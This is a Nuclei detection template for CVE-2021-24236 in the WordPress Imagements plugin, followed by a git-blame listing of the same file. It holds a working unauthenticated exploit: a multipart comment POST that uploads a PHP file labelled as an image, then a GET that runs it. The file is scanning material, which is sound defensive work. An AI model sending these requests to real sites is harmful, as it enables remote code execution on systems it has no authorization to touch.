nuclei-templates/http/cves/2021/CVE-2021-24236.yaml

id: CVE-2021-24236

info:
  name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
  reference:
    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
    - https://wordpress.org/plugins/imagements/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24236
    cwe-id: CWE-434
    cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:*:*:*
    epss-score: 0.13683
  tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive
  metadata:
    max-request: 2

variables:
  php: "{{to_lower('{{randstr}}')}}.php"
  post: "1"

http:
  - raw:
      - |
        POST /wp-comments-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="author"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="email"

        {{randstr}}@email.com
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="url"

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="checkbox"


        yes
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="naam"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="image"; filename="{{php}}"
        Content-Type: image/jpeg

        <?php echo 'CVE-2021-24236'; ?>

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="submit"

        Post Comment
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_post_ID"

        {{post}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_parent"

        0
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--

      - |
        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2021-24236"
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`id: CVE-2021-24236`

			`info:`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`name: WordPress Imagements <=1.2.5 - Arbitrary File Upload`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`author: pussycat0x`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea`
Update CVE-2021-24236.yaml 2022-07-31 04:35:00 +00:00			`- https://wordpress.org/plugins/imagements/`
Update CVE-2021-24236.yaml 2022-07-30 22:42:08 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24236`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`classification:`
Auto Generated CVE annotations [Mon Oct 10 19:40:25 UTC 2022] :robot: 2022-10-10 19:40:25 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`cve-id: CVE-2021-24236`
Auto Generated CVE annotations [Mon Oct 10 19:40:25 UTC 2022] :robot: 2022-10-10 19:40:25 +00:00			`cwe-id: CWE-434`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`cpe: cpe:2.3:a:imagements_project:imagements::::::::`
			`epss-score: 0.13683`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00
			`variables:`
			`php: "{{to_lower('{{randstr}}')}}.php"`
			`post: "1"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`- raw:`
			`- \|`
			`POST /wp-comments-post.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="author"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="email"`

			`{{randstr}}@email.com`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="url"`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="checkbox"`

fix-conflict 2022-10-25 13:40:49 +00:00
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`yes`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="naam"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="image"; filename="{{php}}"`
			`Content-Type: image/jpeg`

			`<?php echo 'CVE-2021-24236'; ?>`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="submit"`

			`Post Comment`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment_post_ID"`

			`{{post}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment_parent"`

			`0`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--`

			`- \|`
			`GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1`
			`Host: {{Hostname}}`

			`req-condition: true`
			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
Update CVE-2021-24236.yaml 2022-07-30 22:42:08 +00:00			`- "CVE-2021-24236"`